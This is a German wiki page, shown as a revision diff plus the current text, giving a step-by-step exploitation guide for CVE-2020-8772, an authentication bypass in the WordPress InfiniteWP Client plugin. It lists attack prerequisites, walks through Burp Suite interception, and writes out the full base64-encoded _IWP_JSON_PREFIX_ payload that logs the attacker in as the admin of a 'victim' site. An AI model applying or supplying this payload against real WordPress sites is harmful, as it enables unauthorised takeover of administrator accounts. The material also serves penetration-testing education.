Authentication Bypass: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 1: | Zeile 1: | ||
| − | = | + | =Anforderungen um diesen Hack auszuführen= |
| − | * | + | *Die Wordpress Website muss das Plugin InfiniteWP Client plugin in der Version < 1.9.4.5 haben. (Ob die Website dieses Plugin besitzt, kann man mit z.b [[https://xinux.net/index.php/Wpscan]] herausfinden) |
| − | + | *Dem Angreifer muss bekannt sein, wie der Username des Admins lautet. | |
| − | + | *Eine Möglichkeit den Payload an die Website zu senden besteht z.b mittels der Burp Suite. | |
| − | + | ;Achtung: Das Plugin kann auch in der Version < 1.9.4.5 sicher sein, falls der Administrator die Schwachstelle manuell behoben hat. | |
| − | * | ||
| − | * | ||
| − | |||
| − | |||
| − | |||
=Beispiel= | =Beispiel= | ||
[[Datei:Wp-hack.png]] | [[Datei:Wp-hack.png]] | ||
| − | = | + | =Vorgehen= |
| − | * | + | *Starten der Burp-Suite |
| − | * | + | *Navigation zu der Registrierkarte "proxy" |
| + | *Öffnen des Navigationpunktes "Intercept" | ||
| + | *Navigationpunkte "Intercept" auf "on" stellen | ||
| + | *Mit dem daraufhin geöffneten Burp-Suite Browsers, zu der Opfer Wordpress Seite navigieren | ||
[[Datei:Authentication-Bypass-Wordpress.png|900px]] | [[Datei:Authentication-Bypass-Wordpress.png|900px]] | ||
| − | = | + | ==Erstellung des Payloads== |
| − | * | + | *Benötigte Parameter zur Generierung des Payloads. |
| − | + | {"iwp_action":"add_site","params":{"username":"admin"}} | |
| − | + | *Erstellen des ersten Teils des Payloads und Konvertieren in base64. | |
| − | + | echo '{"iwp_action":"add_site","params":{"username":"admin"}}' | base64 -w0 | |
| − | + | -> eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQo=% | |
| − | * | + | *Erstellung des Payloads durch Anhängen des zuvor generierten base64 Strings an die Zeichenfolge _IWP_JSON_PREFIX_ . |
| − | + | _IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQo=% | |
| − | + | *Umwandeln der Anfrage Methode von GET in POST (klicken der Rechten Maustaste in der Burp Suite und Auswahl des Menüpunktes „Anfragemethode ändern“) | |
| − | + | *Platzieren Sie den Payload als POST Argumente in der Burp Suite unterhalb der POST Anfrage. | |
| − | *Platzieren Sie den Payload als POST Argumente. | ||
[[Datei:Authentication-Bypass-Wordpress2.png|900px]] | [[Datei:Authentication-Bypass-Wordpress2.png|900px]] | ||
| − | *Klicken Sie auf Forward und schalten Sie | + | *Klicken Sie auf Forward und schalten Sie "Intercept" aus. |
| − | * | + | *Neuladen der Opfer Website im Burp Suite Webbrowser. |
| − | |||
| − | |||
| + | =CVE= | ||
| + | *CVE-2020-8772 | ||
==Links== | ==Links== | ||
| − | |||
[https://blog.pentesteracademy.com/cve-2020-8772-exploitation-under-3-minutes-594265b4e26a Bypass] | [https://blog.pentesteracademy.com/cve-2020-8772-exploitation-under-3-minutes-594265b4e26a Bypass] | ||
Version vom 26. Januar 2023, 17:01 Uhr
Anforderungen um diesen Hack auszuführen
- Die Wordpress Website muss das Plugin InfiniteWP Client plugin in der Version < 1.9.4.5 haben. (Ob die Website dieses Plugin besitzt, kann man mit z.b [[1]] herausfinden)
- Dem Angreifer muss bekannt sein, wie der Username des Admins lautet.
- Eine Möglichkeit den Payload an die Website zu senden besteht z.b mittels der Burp Suite.
- Achtung
- Das Plugin kann auch in der Version < 1.9.4.5 sicher sein, falls der Administrator die Schwachstelle manuell behoben hat.
Beispiel
Vorgehen
- Starten der Burp-Suite
- Navigation zu der Registrierkarte "proxy"
- Öffnen des Navigationpunktes "Intercept"
- Navigationpunkte "Intercept" auf "on" stellen
- Mit dem daraufhin geöffneten Burp-Suite Browsers, zu der Opfer Wordpress Seite navigieren
Erstellung des Payloads
- Benötigte Parameter zur Generierung des Payloads.
{"iwp_action":"add_site","params":{"username":"admin"}}
- Erstellen des ersten Teils des Payloads und Konvertieren in base64.
echo '{"iwp_action":"add_site","params":{"username":"admin"}}' | base64 -w0
-> eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQo=%
- Erstellung des Payloads durch Anhängen des zuvor generierten base64 Strings an die Zeichenfolge _IWP_JSON_PREFIX_ .
_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQo=%
- Umwandeln der Anfrage Methode von GET in POST (klicken der Rechten Maustaste in der Burp Suite und Auswahl des Menüpunktes „Anfragemethode ändern“)
- Platzieren Sie den Payload als POST Argumente in der Burp Suite unterhalb der POST Anfrage.
- Klicken Sie auf Forward und schalten Sie "Intercept" aus.
- Neuladen der Opfer Website im Burp Suite Webbrowser.
CVE
- CVE-2020-8772


